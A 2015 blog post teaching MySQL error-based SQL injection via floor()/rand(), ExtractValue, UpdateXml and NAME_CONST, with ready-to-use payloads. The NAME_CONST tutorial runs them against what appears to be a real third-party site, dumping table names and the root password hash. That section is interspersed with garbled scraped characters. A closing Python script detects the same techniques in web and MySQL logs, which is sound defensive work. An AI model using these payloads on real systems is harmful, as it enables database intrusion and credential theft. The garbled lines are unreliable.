MySQL: exploiting the three error-based injection modes floor, ExtractValue and UpdateXml

Posted on 2015-11-11 19:03:37

1. Error via floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

Example:
First run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version has been leaked through the duplicate-key error. To retrieve other data, replace the version() call with the desired subquery.
For example, to retrieve the administrator's username and password:

Method1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'


Additional collected material:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

Error-based injection tricks for newer MySQL versions: injection via NAME_CONST

It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
* A. l% o5 U9 ]! ^8 [
Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

|---------------|
|     TEST      |
|---------------|
|       1       |
|---------------|

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
+and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'

/ ]0 P$ M$ R* W! M. ~& u2 ~8 A( z& t% I) k# c& y
, `6 D/ A# y6 \) ^0 W. n

! Q. u. ^2 v' ]0 }3 b& s5 y
; p$ F# c7 b8 T5 z0 _* g' {Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...' v' {. l7 w. ^5 B. s1 Y( r! A

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'
Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'

) [4 [- Y  O& z& x3 \7 D% o; w: \5 B. }2 e

6 q7 _7 x! s. s+ K2 C& X$ J( [- }6 z: R5 \4 \- ?( k1 Y

0 }# D8 }5 q9 p5 Y& V# m8 V6 \2 ]8 f' @2 D
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.1 k. ?, x3 }3 _# D6 T' c

, G# {6 |5 e  t! Y0 LLet's get the columns out of the user table... U$ A+ i# M7 m( l' \

# d8 G0 s+ n# vCode:! x# Z1 n  f' r3 n
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--' M9 @) W( ~! l8 s6 C: P
8 x( f. T- C) K; K% ?
% J" B/ l* o( R. \0 }; H# D  v
So mine looks like this, and I get the duplicate column name 'Host'.2 {, b" b; b/ P# X
9 A' A8 e" Z5 N! I/ G
Code:* M4 s3 l( d9 x2 `' Z* E
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
/ k& t) a8 k6 @# I! H( y2 @
/ m6 u$ S7 ~( T4 Z/ r1 a  vErroruplicate column name 'Host'
Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
And there we have it, thanks for reading.
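As an added example (not part of the original post), the following Python flags the four error-based techniques described on this page, floor()/rand() group-by, ExtractValue, UpdateXml and NAME_CONST, both in web-server access logs and in MySQL error output. The log lines, IP addresses and timestamps are constructed; the error-string patterns follow the MySQL messages quoted above.

```python
import re
from urllib.parse import unquote_plus
# Request-side signatures for the four error-based techniques on this page,
# matched against the URL-decoded, lower-cased query string of each request.
REQUEST_SIGNATURES = {
    "floor_rand_groupby": re.compile(r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\).*group\s+by"),
    "extractvalue": re.compile(r"\bextractvalue\s*\("),
    "updatexml": re.compile(r"\bupdatexml\s*\("),
    "name_const_dup": re.compile(r"\bname_const\s*\(.*\bname_const\s*\("),
}
# Server-side signatures: the MySQL errors these techniques provoke, as they show
# up in a database or application error log even when the request was not logged.
ERROR_SIGNATURES = {
    "floor_rand_groupby": re.compile(r"ERROR 1062 .*Duplicate entry .* for key 'group_key'"),
    "xpath_error": re.compile(r"ERROR 1105 .*XPATH syntax error"),
    "name_const_dup": re.compile(r"Duplicate column name"),
}
# Extracts the query string from an Apache/nginx style request line.
REQUEST_LINE = re.compile(r'"(?:GET|POST) \S*?\?(\S*) HTTP/')

def classify_request(access_log_line):
    """Names of the techniques whose signature appears in the request's query string."""
    m = REQUEST_LINE.search(access_log_line)
    if not m:
        return []
    query = unquote_plus(m.group(1)).lower()
    return [name for name, pat in REQUEST_SIGNATURES.items() if pat.search(query)]

def classify_error(error_log_line):
    """Names of the techniques consistent with a logged MySQL error message."""
    return [name for name, pat in ERROR_SIGNATURES.items() if pat.search(error_log_line)]

def scan(lines, classifier):
    """(line_number, techniques) for every line that matches at least one signature."""
    return [(n, found) for n, line in enumerate(lines, 1) if (found := classifier(line))]

# Constructed sample data: a benign request followed by this page's own payloads.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [11/Nov/2015:19:03:37 +0800] "GET /content/detail.php?id=330&sid=19&cid=261 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [11/Nov/2015:19:04:02 +0800] "GET /content/detail.php?id=1+and+(select+1+from+(select+count(*),concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) HTTP/1.1" 500 312',
    '10.0.0.9 - - [11/Nov/2015:19:04:10 +0800] "GET /content/detail.php?id=1+and+extractvalue(1,concat(0x5c,(select+pass+from+admin+limit+1))) HTTP/1.1" 500 298',
    '10.0.0.9 - - [11/Nov/2015:19:04:15 +0800] "GET /content/detail.php?id=330+and+1%3D(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- HTTP/1.1" 500 301',
]
SAMPLE_ERROR_LOG = [
    "2015-11-11 19:03:37 query ok: select * from article where id = 330",
    "2015-11-11 19:04:02 ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'",
    "2015-11-11 19:04:10 ERROR 1105 (HY000): XPATH syntax error: '\\admin888'",
    "2015-11-11 19:04:15 ERROR 1060 (42S21): Duplicate column name '5.0.27-community-nt'",
]
```

Running `scan(SAMPLE_ACCESS_LOG, classify_request)` flags lines 2 to 4 and leaves the benign first request alone; the same scan over the error log matches the three MySQL error messages, which is the signal to watch for when the web tier does not log full query strings.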
